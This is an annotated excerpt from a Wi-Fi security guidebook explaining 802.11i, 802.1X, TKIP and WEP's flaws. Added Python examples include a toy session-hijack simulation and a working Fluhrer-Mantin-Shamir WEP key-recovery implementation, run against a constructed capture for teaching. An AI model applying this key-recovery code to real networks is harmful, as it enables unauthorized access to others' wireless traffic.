802.11i

Wired Equivalent Privacy (WEP) was broken in August 2001 by a team at AT&T Labs, based on work published earlier that same month by Scott Fluhrer, Itsik Mantin, and Adi Shamir. (The Fluhrer, Mantin, and Shamir paper was about a weakness in the key scheduling of RC4, the stream cipher WEP uses; the way WEP prepends a per-packet initialization vector to the secret key is what makes that weakness exploitable, and it was the AT&T team that turned it into a working attack on real hardware.) Ever since then, security has been the Big Honking Problem with wireless networking.

Earlier, in March 2001, the IEEE formed the 802.11i task group to standardize security in wireless LANs. This was before WEP was cracked, but many thought even then that WEP was at best a bare-minimum security technology. For example, WEP does nothing to prevent the legitimate clients on a wireless network from reading one another's traffic. WEP protects only against outsiders who do not hold the key. The same key encrypts all traffic into and out of a single access point, so every connected client must have that key, and hence there is no privacy at all among the clients.

Concerns like this led to the task group's creation, but as yet nothing has been approved, though a draft is circulating now in early 2003. The general approach to 802.11i security has two layers: 802.1X authentication and a WEP fix called the Temporal Key Integrity Protocol (TKIP).

802.1X Authentication

A good part of the 802.11i task group's mission is to incorporate 802.1X authentication cleanly into the 802.11 standard. Although the names are confusingly similar, 802.1X is not part of 802.11. IEEE 802.1 is a separate family of standards that specifies management and bridging mechanisms for both wired and wireless LANs. 802.1X lays out a port-based authentication framework: the client (the supplicant) and the access point (the authenticator) exchange EAP messages, the access point relays them to an authentication server, and the access point refuses to forward the client's traffic until the server says yes. With an EAP method that authenticates both sides (EAP-TLS, for example), the client can also verify that the access point is the real thing and not a hacker emulating an access point in a 'man in the middle' attack. 802.1X itself does not guarantee this; a one-way EAP method leaves the client with no such check.

One of the challenges in using 802.1X authentication is that it requires a fair amount of centralized administration, including an authentication server program running somewhere on the network to which the access point is connected. In a corporate LAN this isn't a problem. In a home office or small office environment, however, it could be a showstopper.

Nor is 802.1X authentication completely hack-proof. A 'session hijacking' attack was published by University of Maryland researchers William Arbaugh and Arunesh Mishra in February 2002. It works because the 802.11 association state and the 802.1X authentication state are not kept in step, and because 802.11 management frames are not authenticated at all. The attacker forges a disassociation frame that appears to come from the access point and sends it to a client that has already authenticated; the client obediently drops off the network. The access point's 802.1X port for that client's MAC address stays open, so the attacker simply continues the session using the client's address, with neither the client nor the access point (and thus the authentication server) realizing that anything is amiss.

The root of the problem is that 802.1X, as written, authorizes a port for a MAC address and knows nothing about the 802.11 association underneath it, so the two can fall out of step. The fix proposed for 802.11i keeps the two state machines synchronized, so that losing an association also closes the port, and goes a step further by binding each session's traffic to keys derived during authentication; a spoofed MAC address then no longer buys an attacker anything.
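As an added illustration (not from the book, and not the researchers' code), here is a toy Python model of the hijack just described. The access point opens an 802.1X 'controlled port' per station MAC address once the authentication server says yes; the `keyed` option models the mitigation that 802.11i eventually adopted, binding that port to a per-session key so that every data frame must be tagged under it. The class and function names, the MAC address, the payloads and the HMAC-SHA256 tag are all constructed for this demo and stand in for the real 802.11i key handshake and per-frame integrity check.

```python
# Added example, not from the book: toy model of the 2002 Mishra/Arbaugh
# session hijack against 802.1X and of a keyed-port mitigation.
import hashlib
import hmac
import os


class AccessPoint:
    """Authenticator: tracks 802.11 association and the 802.1X controlled port
    per station MAC. With keyed=False the port is opened purely by MAC address,
    as the 2002 analysis found; with keyed=True every data frame must carry a
    tag under a key handed out only to the station that authenticated."""

    def __init__(self, keyed=False):
        self.keyed = keyed
        self.associated = set()
        self.port_key = {}      # mac -> session key (None when the port is unkeyed)
        self.forwarded = []

    def associate(self, mac):
        self.associated.add(mac)

    def eap_success(self, mac):
        """Authentication server accepted the client: open the controlled port."""
        if mac not in self.associated:
            return None
        key = os.urandom(16) if self.keyed else None
        self.port_key[mac] = key
        return key          # stands in for the key the supplicant derives itself

    def data(self, mac, payload, tag=b""):
        """Forward a data frame only if the port for `mac` is open and, when
        keyed, the frame is tagged with that station's session key."""
        if mac not in self.port_key:
            return False
        key = self.port_key[mac]
        if key is not None:
            expected = hmac.new(key, payload, hashlib.sha256).digest()
            if not hmac.compare_digest(tag, expected):
                return False
        self.forwarded.append((mac, payload))
        return True


class Station:
    def __init__(self, mac):
        self.mac, self.key, self.associated = mac, None, False

    def join(self, ap):
        ap.associate(self.mac)
        self.associated = True
        self.key = ap.eap_success(self.mac)

    def receive_mgmt(self, frame):
        # 802.11 management frames are unauthenticated: a disassociation that
        # merely claims to come from the AP is obeyed as-is.
        if frame == "disassociate":
            self.associated = False

    def send(self, ap, payload):
        if not self.associated:
            return False
        tag = hmac.new(self.key, payload, hashlib.sha256).digest() if self.key else b""
        return ap.data(self.mac, payload, tag)


def hijack(keyed):
    """Run the attack; return (victim_sent, victim_kicked, attacker_forwarded)."""
    ap = AccessPoint(keyed)
    victim = Station("00:11:22:33:44:55")          # constructed address
    victim.join(ap)
    victim_sent = victim.send(ap, b"legit traffic")
    # The attacker forges a disassociation "from the AP" to the victim ...
    victim.receive_mgmt("disassociate")
    victim_kicked = not victim.send(ap, b"after kick")
    # ... then sends data with the victim's MAC. The AP's 802.1X port for that
    # MAC is still open; only a per-session key tells the two apart.
    attacker_forwarded = ap.data(victim.mac, b"attacker traffic")
    return victim_sent, victim_kicked, attacker_forwarded


if __name__ == "__main__":
    print("unkeyed port:", hijack(keyed=False))   # (True, True, True): hijack succeeds
    print("keyed port:  ", hijack(keyed=True))    # (True, True, False): hijack fails
```

Synchronizing the two state machines on its own is not enough here, because the access point never sees the forged disassociation; it is the per-session key, which the attacker cannot produce from a MAC address alone, that closes the hole.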

WEP Key Management with TKIP

One of the things WEP lacks is effective automatic key management. Because keys are set manually and changed only when the network administrator decides to change them (again, manually), WEP keys do not change very often. This is especially true in larger organizations with many users and lots of laptops floating around, not always in places where they can easily be found. When a given key is used for too long it becomes vulnerable to cracking, because the attack depends on the number of packets intercepted that were encrypted under that key: each packet uses a fresh 24-bit initialization vector prepended to the same secret key, and a fraction of those IVs leak a little information about the key bytes. If a hacker with a packet sniffer intercepts enough packets encrypted with the same key, utilities like AirSnort can crack it.

In lightly used networks (like those in home offices) it takes a long time to gather enough packets to crack WEP; in some cases a month or more. (This is why WEP is relatively secure for home network use, contrary to conventional wisdom.) But in heavily used corporate networks where an access point is moving packets continuously, without pause, an AirSnort attack can succeed in as little as five hours. Note that this arithmetic assumes an attacker who only listens; an attacker who replays captured frames to make the access point generate traffic on demand removes the dependence on how busy the network is, and WEP cracking tools developed after this was written do exactly that.

The whole idea of intelligent key management is to link renewal of keys to the volume of packets sent through a given wireless access point. If the keys are changed before enough traffic has passed through the access point to allow an AirSnort attack, the attack is foiled and AirSnort has to begin packet sniffing again from scratch. There is a performance cost to replacing keys frequently, but the hope for TKIP is to renew a wireless network's keys just often enough to prevent a packet-gathering sniffer attack. Ongoing research will refine our understanding of how often keys need to change, but at the moment it looks like every 10,000 packets or so.

TKIP also stops feeding the attacker weak per-packet keys in the first place. Instead of simply prepending the initialization vector to the secret key, as WEP does, TKIP mixes a 48-bit per-packet sequence counter with the temporal key and the transmitter's MAC address to derive a separate RC4 key for every packet, so the per-packet keys no longer share the structure that AirSnort-type attacks depend on. The sequence counter also lets the receiver drop replayed packets, and a keyed message integrity check (called Michael) replaces WEP's forgeable CRC-32 integrity value.
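To make the last two sections concrete, here is an added Python example (not from the book, and not AirSnort's code) that builds a miniature WEP, constructs a capture of frames under a made-up 40-bit key, and recovers the key with the Fluhrer-Mantin-Shamir method that AirSnort automates. Because the first payload byte of an 802.11 data frame is the known LLC/SNAP byte 0xAA, every captured frame leaks one keystream byte, and frames whose IV has the 'weak' shape (B, 255, X) let the attacker vote on key byte B. The capture holds 256 such frames per key byte; the rekey rule discussed above works by never letting that many frames go out under one key. The key, IVs, payload and all function names are constructed for this demo.

```python
# Added example, not from the book or AirSnort: a miniature WEP and the
# Fluhrer-Mantin-Shamir key recovery it is vulnerable to. Key, IVs and
# payloads below are constructed for the demo.
import zlib
from collections import Counter

SNAP = bytes.fromhex("aaaa03000000")    # LLC/SNAP header: nearly every 802.11
                                        # data payload starts with 0xAA (known)
WEP_KEY = bytes.fromhex("1f2a3b4c5d")   # made-up 40-bit key; unknown to attacker


def ksa(key, steps=256):
    """RC4 key scheduling. With steps < 256 this returns the partial state
    (S, j) after the first `steps` rounds, which is what FMS reasons about."""
    S = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def rc4_stream(key, n):
    """First n bytes of RC4 keystream for `key`."""
    S, _ = ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key, iv, payload):
    """WEP per-packet key is the 24-bit IV prepended to the shared key; the
    keystream is XORed over payload || CRC-32 ICV. Returns iv || ciphertext."""
    body = payload + zlib.crc32(payload).to_bytes(4, "little")
    ks = rc4_stream(iv + key, len(body))
    return iv + bytes(a ^ b for a, b in zip(body, ks))


def wep_decrypt(key, frame):
    """Payload if the ICV verifies, else None. Any station holding the shared
    key can do this to any other station's frames."""
    iv, ct = frame[:3], frame[3:]
    ks = rc4_stream(iv + key, len(ct))
    body = bytes(a ^ b for a, b in zip(ct, ks))
    payload, icv = body[:-4], body[-4:]
    return payload if zlib.crc32(payload).to_bytes(4, "little") == icv else None


def fms_votes(frames, prefix):
    """Vote for the next secret-key byte, at RC4 key index B = 3 + len(prefix),
    given the secret-key bytes already recovered in `prefix`."""
    B = 3 + len(prefix)
    votes = Counter()
    for frame in frames:
        iv, out = frame[:3], frame[3] ^ SNAP[0]   # leaked keystream byte 0
        S, j = ksa(list(iv) + prefix, B)
        if S[1] < B and (S[1] + S[S[1]]) & 0xFF == B:   # FMS "resolved" IV
            # ~5% of the time the first output byte is S[j_B], giving
            # K[B] = j_B - j_(B-1) - S[B]; the rest of the votes are noise
            votes[(S.index(out) - j - S[B]) & 0xFF] += 1
    return votes


def recover_key(frames, key_len, probe_frame, width=8):
    """Depth-first search over the `width` best-voted candidates per byte; a
    full key is accepted only if it decrypts `probe_frame` with a valid ICV."""
    def search(prefix):
        if len(prefix) == key_len:
            guess = bytes(prefix)
            return guess if wep_decrypt(guess, probe_frame) is not None else None
        for cand, _ in fms_votes(frames, prefix).most_common(width):
            found = search(prefix + [cand])
            if found is not None:
                return found
        return None
    return search([])


def build_capture(key):
    """Constructed capture: one frame under each classic weak IV (B, 255, X)
    for each secret-key position B, the sort of weak IVs a busy access point
    sends out over a few hours."""
    frames = []
    for B in range(3, 3 + len(key)):
        for X in range(256):
            frames.append(wep_encrypt(key, bytes([B, 255, X]), SNAP + b"\x08\x00ping"))
    return frames


CAPTURE = build_capture(WEP_KEY)

if __name__ == "__main__":
    print(recover_key(CAPTURE, len(WEP_KEY), CAPTURE[0]).hex())   # 1f2a3b4c5d
```

wep_decrypt also shows the earlier point about a shared key: any station holding it can decrypt any other station's frames. A single FMS vote is right only about five percent of the time, so the search is widened to the eight best-voted candidates per byte and uses the CRC-32 ICV of one captured frame as the acceptance test; a real attacker has no other way to know when to stop.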

Once the TKIP mechanism is fully defined and the 802.11i standard approved, access point and client adapter firmware will have to be upgraded for TKIP to work, but TKIP would appear to be our best near-term bet for fixing the gaping hole in WEP security.

Ultimately, WEP will have to be abandoned entirely. Far more secure wireless network encryption systems are on the drawing boards. WEP's eventual heir is likely to be the Wireless Robust Authenticated Protocol (WRAP), which is built on the AES block cipher rather than RC4. (As it turned out, the approved 802.11i standard made AES-CCMP, not WRAP, the mandatory replacement; either way the cipher is AES.) Because an AES-based protocol is completely incompatible with WEP, it will probably require a whole new generation of wireless hardware.

802.11i is still being actively debated, and it's unlikely that firmware upgrades or new products will appear before mid-to-late 2003. In the meantime, the Wi-Fi Alliance (formerly WECA) has developed tests for a subset of 802.11i that can be implemented in firmware without changes to existing Wi-Fi certified hardware. This program is called Wi-Fi Protected Access (WPA) and was announced in the fall of 2002. The Wi-Fi Alliance feared that a tidal wave of bad publicity about Wi-Fi security would damage the acceptance of Wi-Fi in corporate IT shops. (These were not groundless fears!) WPA-compliant devices should become available in the first quarter of 2003 or very soon after.



Jeff Duntemann's Drive-By Wi-Fi Guide
ISBN: 1932111743
Year: 2005
Pages: 181
